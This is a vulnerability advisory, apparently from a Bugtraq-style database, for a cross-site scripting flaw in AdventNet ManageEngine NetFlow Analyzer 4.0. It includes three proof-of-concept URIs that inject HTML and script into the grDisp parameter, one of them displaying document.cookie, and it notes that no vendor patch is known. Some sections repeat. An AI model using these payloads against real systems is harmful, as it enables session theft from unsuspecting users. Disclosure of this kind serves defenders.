NetFlow Analyzer 4 Cross-Site Scripting Vulnerability
BID:15127
Info
NetFlow Analyzer 4 Cross-Site Scripting Vulnerability
| Bugtraq ID: | 15127 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Oct 18 2005 12:00AM |
| Updated: | Oct 18 2005 12:00AM |
| Credit: | [email protected] is credited with the discovery of this vulnerability. |
| Vulnerable: |
AdventNet ManageEngine NetFlow Analyzer 4.0 |
| Not Vulnerable: | |
Discussion
NetFlow Analyzer 4 Cross-Site Scripting Vulnerability
NetFlow Analyzer 4 is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
NetFlow Analyzer 4 is prone to a cross-site scripting vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.
An attacker may leverage this issue to have arbitrary script code executed in the browser of an unsuspecting user in the context of the affected site. This may facilitate the theft of cookie-based authentication credentials as well as other attacks.
Exploit / POC
NetFlow Analyzer 4 Cross-Site Scripting Vulnerability
No exploit is required.
Proof of concept URI have been provided:
http://www.example.com:8080/netflow/jspui/index.jsp?grID=-1&view=groups&grDisp=<h1>test</h1>
http://www.example.com:8080/netflow/jspui/index.jsp?grID=-1&view=groups&grDisp=<script>alert("test")</script>
http://www.example.com:8080/netflow/jspui/index.jsp?grID=-1&view=groups&grDisp=<script>alert(document.cookie)</script>
No exploit is required.
Proof of concept URI have been provided:
http://www.example.com:8080/netflow/jspui/index.jsp?grID=-1&view=groups&grDisp=<h1>test</h1>
http://www.example.com:8080/netflow/jspui/index.jsp?grID=-1&view=groups&grDisp=<script>alert("test")</script>
http://www.example.com:8080/netflow/jspui/index.jsp?grID=-1&view=groups&grDisp=<script>alert(document.cookie)</script>
Solution / Fix
NetFlow Analyzer 4 Cross-Site Scripting Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
Solution:
Currently we are not aware of any vendor-supplied patches for this issue. If you feel we are in error or are aware of more recent information, please mail us at: [email protected] <mailto:[email protected]>.
References
NetFlow Analyzer 4 Cross-Site Scripting Vulnerability
References:
References:
- AdventNet NetFlow Analyzer 4 Web Page (AdventNet)